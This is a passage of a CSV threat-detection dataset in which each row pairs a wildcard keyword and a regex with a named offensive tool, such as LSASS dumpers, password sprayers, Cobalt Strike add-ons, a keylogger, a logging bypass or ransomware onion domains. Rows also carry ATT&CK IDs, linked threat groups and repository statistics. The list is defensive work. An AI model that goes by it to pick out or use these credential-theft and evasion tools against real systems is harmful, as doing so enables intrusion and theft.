"*OffensiveCSharp*ETWEventSubscription*",".{0,1000}OffensiveCSharp.{0,1000}ETWEventSubscription.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","53841"
"*OffensiveCSharp-master*",".{0,1000}OffensiveCSharp\-master.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","53842"
"*OffensiveLua-main*",".{0,1000}OffensiveLua\-main.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","53843"
"*Offensive-Panda/LsassReflectDumping*",".{0,1000}Offensive\-Panda\/LsassReflectDumping.{0,1000}","offensive_tool_keyword","LsassReflectDumping","leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created - it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned process","T1003.001 - T1555.003 - T1077","TA0006","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/LsassReflectDumping","1","1","N/A","N/A","10","2","198","27","2024-10-19T08:16:13Z","2024-10-17T14:57:30Z","53844"
"*Offensive-Panda/ShadowDumper/*",".{0,1000}Offensive\-Panda\/ShadowDumper\/.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","1","N/A","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","53845"
"*Offensive-Windows-IPC-1-NamedPipes.*",".{0,1000}Offensive\-Windows\-IPC\-1\-NamedPipes\..{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","53846"
"*office2john.py*",".{0,1000}office2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53847"
"*office365userenum.*",".{0,1000}office365userenum\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53848"
"*Office-DDE-Payloads*",".{0,1000}Office\-DDE\-Payloads.{0,1000}","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","N/A","7","638","155","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z","53849"
"*Offline_WinPwn.ps1*",".{0,1000}Offline_WinPwn\.ps1.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","53855"
"*offlinereg-win32.exe*",".{0,1000}offlinereg\-win32\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53856"
"*offlinereg-win64.exe*",".{0,1000}offlinereg\-win64\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53857"
"*offsecginger/koadic*",".{0,1000}offsecginger\/koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","53858"
"*OFTC/tor2web/*",".{0,1000}OFTC\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","53859"
"*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*",".{0,1000}OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA\=.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","53860"
"*OG-Sadpanda/SharpCat*",".{0,1000}OG\-Sadpanda\/SharpCat.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","N/A","10","10","16","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z","53861"
"*OG-Sadpanda/SharpSword*",".{0,1000}OG\-Sadpanda\/SharpSword.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","10","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","53862"
"*OG-Sadpanda/SharpSword*",".{0,1000}OG\-Sadpanda\/SharpSword.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","53863"
"*OG-Sadpanda/SharpZippo*",".{0,1000}OG\-Sadpanda\/SharpZippo.{0,1000}","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","N/A","10","10","59","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z","53864"
"*Oh365UserFinder.git*",".{0,1000}Oh365UserFinder\.git.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","N/A","6","539","94","2025-01-23T19:50:46Z","2021-11-16T22:59:04Z","53865"
"*oh365userfinder.py*",".{0,1000}oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","53866"
"*oh365userfinder.py*",".{0,1000}oh365userfinder\.py.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","N/A","6","539","94","2025-01-23T19:50:46Z","2021-11-16T22:59:04Z","53867"
"*Oh365UserFinder-main*",".{0,1000}Oh365UserFinder\-main.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","N/A","6","539","94","2025-01-23T19:50:46Z","2021-11-16T22:59:04Z","53868"
"*oh-az/NoArgs*",".{0,1000}oh\-az\/NoArgs.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","53869"
"*oHD9EjJcITqhVYleFRX47sNLtKx6gWnG8wU0iaP5C1pdSrbMuZfBzmyvk23OAQ*",".{0,1000}oHD9EjJcITqhVYleFRX47sNLtKx6gWnG8wU0iaP5C1pdSrbMuZfBzmyvk23OAQ.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","53870"
"*ohmva4gbywokzqso.onion*",".{0,1000}ohmva4gbywokzqso\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53871"
"*ohmva4gbywokzqso.onion.cab*",".{0,1000}ohmva4gbywokzqso\.onion\.cab.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53872"
"*ohmva4gbywokzqso.tor2web.org*",".{0,1000}ohmva4gbywokzqso\.tor2web\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53873"
"*OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx*",".{0,1000}OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH\/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","53874"
"*ojggmchlghnjlapmfbnjholfjkiidbch*",".{0,1000}ojggmchlghnjlapmfbnjholfjkiidbch.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53876"
"*Okta-Password-Sprayer*",".{0,1000}Okta\-Password\-Sprayer.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003 - T1621","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","1","N/A","N/A","10","1","70","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z","53877"
"*oldboy21/LDAP-Password-Hunter*",".{0,1000}oldboy21\/LDAP\-Password\-Hunter.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","53878"
"*oldboy21/SMBAT*",".{0,1000}oldboy21\/SMBAT.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","53879"
"*oldboy21/SMBSR*",".{0,1000}oldboy21\/SMBSR.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","53880"
"*OLDNamedPipeServer.ps1*",".{0,1000}OLDNamedPipeServer\.ps1.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","53881"
"*OleViewDotNet.psd1*",".{0,1000}OleViewDotNet\.psd1.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","Dispossessor","Exploitation tool","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","N/A","10","907","125","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z","53882"
"*Oliver-1-1/GhostMapper*",".{0,1000}Oliver\-1\-1\/GhostMapper.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","53883"
"*OlivierLaflamme/PyExec*",".{0,1000}OlivierLaflamme\/PyExec.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","53884"
"*OmerYa/Invisi-Shell*",".{0,1000}OmerYa\/Invisi\-Shell.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","53886"
"*-OMG-Credz-Plz*",".{0,1000}\-OMG\-Credz\-Plz.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53887"
"*OMGdump.zip*",".{0,1000}OMGdump\.zip.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53888"
"*OMGLoggerDecoder*",".{0,1000}OMGLoggerDecoder.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53890"
"*omg-payloads*/payloads/*",".{0,1000}omg\-payloads.{0,1000}\/payloads\/.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53891"
"*omg-payloads-master*",".{0,1000}omg\-payloads\-master.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53892"
"*omnibus clean metasploit-framework*",".{0,1000}omnibus\sclean\smetasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","53893"
"*Omnispray | Modular Enumeration and Password Spraying Framework*",".{0,1000}Omnispray\s\|\sModular\sEnumeration\sand\sPassword\sSpraying\sFramework.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","53894"
"*OmriBaso/BesoToken*",".{0,1000}OmriBaso\/BesoToken.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","53895"
